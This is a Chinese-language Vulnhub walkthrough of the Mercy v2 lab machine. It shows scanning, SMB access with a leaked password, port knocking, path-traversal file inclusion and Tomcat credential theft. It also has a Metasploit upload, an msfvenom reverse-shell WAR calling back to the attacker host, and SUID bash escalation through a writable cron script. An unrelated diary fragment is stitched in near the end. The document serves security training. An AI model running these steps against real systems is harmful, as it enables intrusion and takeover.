Vulnhub:Digitalworld.local (Mercy v2)靶机
Posted ctostm
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulnhub:Digitalworld.local (Mercy v2)靶机相关的知识,希望对你有一定的参考价值。
kali:192.168.111.111
靶机:192.168.111.130
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130
使用enum4linux对目标smb服务进行枚举
enum4linux -a 192.168.111.130
目标文件共享的目录
目标存在的用户
8080端口的网站robots.txt提示存在一个文件
访问该文件得到一串base64加密的密文,之后对密文进行解密,解密密文提示存在一个密码:password
echo \'SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg==\' | base64 -d
使用用户qiu和密码:password,查看目标文件共享
smbclient -U qiu \\\\\\\\192.168.111.130\\\\qiu
在\\.private\\opensesame目录下存放有两个文件
查看configprint发现是一个脚本,其中把/etc/knockd.conf配置文件追加到config文件中
使用knock进行端口碰撞开启22和80端口
knock 192.168.111.130 159 27391 4 -v
knock 192.168.111.130 17301 28504 9999 -v
漏洞利用
访问目标80的robots.txt,提示两个目录
其中/nomercy目录下的rips cms存在文件包含漏洞
searchsploit rips
http://192.168.111.130/nomercy/windows/code.php?file=../../../../../../etc/passwd
在8080端口首页存在提示:
注意:出于安全原因,使用管理器 Web 应用程序仅限于角色为“manager-gui”的用户。主机管理器 Web 应用仅限于角色为“admin-gui”的用户。用户在 /etc/tomcat7/tomcat-users.xml 中定义。
文件包含/etc/tomcat7/tomcat-users.xml,在页面底部有用户fluffy和thisisasuperduperlonguser的密码
http://192.168.111.130/nomercy/windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml
使用thisisasuperduperlonguser用户登录8080端口的tomcat后台
拿shell的两种方法
第一种
使用msf模块exploit/multi/http/tomcat_mgr_upload上传反弹shell
use exploit/multi/http/tomcat_mgr_upload
set rhosts 192.168.111.130
set rport 8080
set Httpusername thisisasuperduperlonguser
set httppassword heartbreakisinevitable
run
第二种
使用msfvenom生成war包,上传war包后执行反弹shell
msfvenom -p linux/x86/shell_reverse_tcp lhost=192.168.111.111 lport=5555 -f war > shell1.war
使用7z查看war包内容
7z l shell1.war
上传后会自动生成目录(目录名为war包文件名),反弹shell为使用7z查看的.jsp后缀文件
访问http://192.168.111.130:8080/shell1/sjwdzibqunxeli.jsp获得反弹shell
提权
使用之前在/etc/tomcat7/tomcat-users.xml发现的fluffy用户密码切换到fluffy用户
在fluffy用户家目录下的.private/secrets目录中发现timeclock文件
猜测是计划任务(文件名提示这么明显了),同时该文件有777权限,修改文件内容提权
echo \'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash\' >> timeclock
/tmp/bash -p
今天到底第几天222林林
今日
对代码注释进行补完,参照去年的报告列报告纲
明日
对课程结果报告进行补充
今日小结
课程报告我认为这是一个很需要磨的东西,急是急不来的
一天磨一个版块,希望可以在周四之前磨掉
正所谓慢工出细活,设计问题这么大,报告可不能再出错了
以上是关于Vulnhub:Digitalworld.local (Mercy v2)靶机的主要内容,如果未能解决你的问题,请参考以下文章